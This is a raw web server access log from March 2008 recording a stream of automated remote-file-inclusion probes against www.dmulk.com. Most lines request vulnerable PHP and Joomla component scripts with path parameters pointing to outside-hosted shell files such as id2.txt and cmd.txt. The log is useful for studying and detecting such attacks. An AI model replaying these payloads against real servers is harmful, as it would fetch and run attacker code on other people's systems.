216.18.5.126 - - [25/Mar/2008:08:09:20 -0700] "GET //?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
158.110.147.192 - - [25/Mar/2008:08:09:39 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
158.110.147.192 - - [25/Mar/2008:08:09:39 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:09:47 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:09:48 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:09:48 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:08:09:49 -0700] "GET /logs/access_080221.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:08:09:49 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:08:09:49 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:08:09:50 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.94.66 - - [25/Mar/2008:08:09:56 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.94.66 - - [25/Mar/2008:08:09:56 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.94.66 - - [25/Mar/2008:08:09:56 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.210.71 - - [25/Mar/2008:08:10:36 -0700] "GET /logs/access_080131.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.210.71 - - [25/Mar/2008:08:10:36 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.210.71 - - [25/Mar/2008:08:10:36 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.210.71 - - [25/Mar/2008:08:10:38 -0700] "GET /logs/access_080201.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:08:10:51 -0700] "GET /logs/access_080221.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:11:04 -0700] "GET /logs/access_080124.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:11:14 -0700] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:11:14 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:11:20 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:11:20 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:11:20 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:11:24 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:11:24 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:11:24 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:11:30 -0700] "GET /logs/access_080219.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:11:33 -0700] "GET /logs/access_080219.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:08:12:10 -0700] "GET /logs/access_080127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:08:12:16 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:08:12:16 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:08:12:17 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:12:25 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:12:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:12:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:12:28 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:12:28 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:12:28 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:12:38 -0700] "GET /logs/access_080219.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:12:42 -0700] "GET /logs/access_080219.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.8.120 - - [25/Mar/2008:08:12:43 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:13:02 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.80.93.168 - - [25/Mar/2008:08:13:28 -0700] "GET /logs/access_080225.log//index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [25/Mar/2008:08:13:28 -0700] "GET //index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [25/Mar/2008:08:13:29 -0700] "GET /logs//index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [25/Mar/2008:08:13:43 -0700] "GET /logs/access_080215.log//index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.243.27.226 - - [25/Mar/2008:08:13:56 -0700] "GET /logs/access_080312.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.pnauk.org.uk/samPHPweb/common/metabase/metabase_pgsql??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:14:27 -0700] "GET /logs/access_071231.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [25/Mar/2008:08:15:00 -0700] "GET /logs/access_080207.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [25/Mar/2008:08:15:00 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:08:15:11 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:15:11 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:15:12 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:08:15:13 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:08:15:15 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [25/Mar/2008:08:15:45 -0700] "GET //components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.19.107.122 - - [25/Mar/2008:08:15:45 -0700] "GET /logs//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
69.60.118.137 - - [25/Mar/2008:08:16:00 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cgiha.org/cms/images/zoom/LVDSKE/thumbs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.40.137 - - [25/Mar/2008:08:16:16 -0700] "GET /logs/access_071212.log//protection.php?action=logout&siteurl=http://www.ham-sur-heure-nalinnes.net/poll/polldata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.208.40.137 - - [25/Mar/2008:08:16:19 -0700] "GET /logs/access_071216.log//protection.php?action=logout&siteurl=http://www.ham-sur-heure-nalinnes.net/poll/polldata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:16:20 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/cakep-abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:16:42 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:16:42 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:16:42 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.8.120 - - [25/Mar/2008:08:16:49 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:16:53 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:08:17:20 -0700] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:17:27 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:17:32 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.172.140.56 - - [25/Mar/2008:08:17:41 -0700] "GET /logs/access_080312.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cgiha.org/cms/images/zoom/LVDSKE/thumbs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.107.122 - - [25/Mar/2008:08:18:11 -0700] "GET //components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.19.107.122 - - [25/Mar/2008:08:18:11 -0700] "GET /logs//components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
212.175.137.162 - - [25/Mar/2008:08:18:30 -0700] "GET /logs/access_080124.log/?mosConfig_absolute_path=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.137.162 - - [25/Mar/2008:08:18:31 -0700] "GET /?mosConfig_absolute_path=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.137.162 - - [25/Mar/2008:08:18:32 -0700] "GET /logs/?mosConfig_absolute_path=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 200 40263 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.120 - - [25/Mar/2008:08:19:08 -0700] "GET /logs/access.log HTTP/1.0" 200 242471 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:19:15 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:19:16 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:19:16 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:08:19:31 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.30.146 - - [25/Mar/2008:08:20:26 -0700] "GET /logs/access_080313.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:21:09 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:21:09 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:21:09 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:08:21:44 -0700] "GET /logs/access_080124.log/side.php?table=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:08:21:45 -0700] "GET /logs/access_080124.log/side.php?table=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:08:21:45 -0700] "GET /side.php?table=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:08:21:45 -0700] "GET /side.php?table=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:08:21:46 -0700] "GET /logs/side.php?table=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:08:21:46 -0700] "GET /logs/side.php?table=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:22:06 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/cakep-abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:22:06 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/cakep-abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:22:32 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:22:32 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.53.229.194 - - [25/Mar/2008:08:22:33 -0700] "GET /logs/access_080219.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/cakep-abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:23:01 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:23:06 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:23:06 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:23:06 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:23:35 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:23:54 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:23:54 -0700] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:23:54 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:23:54 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:23:54 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:23:54 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
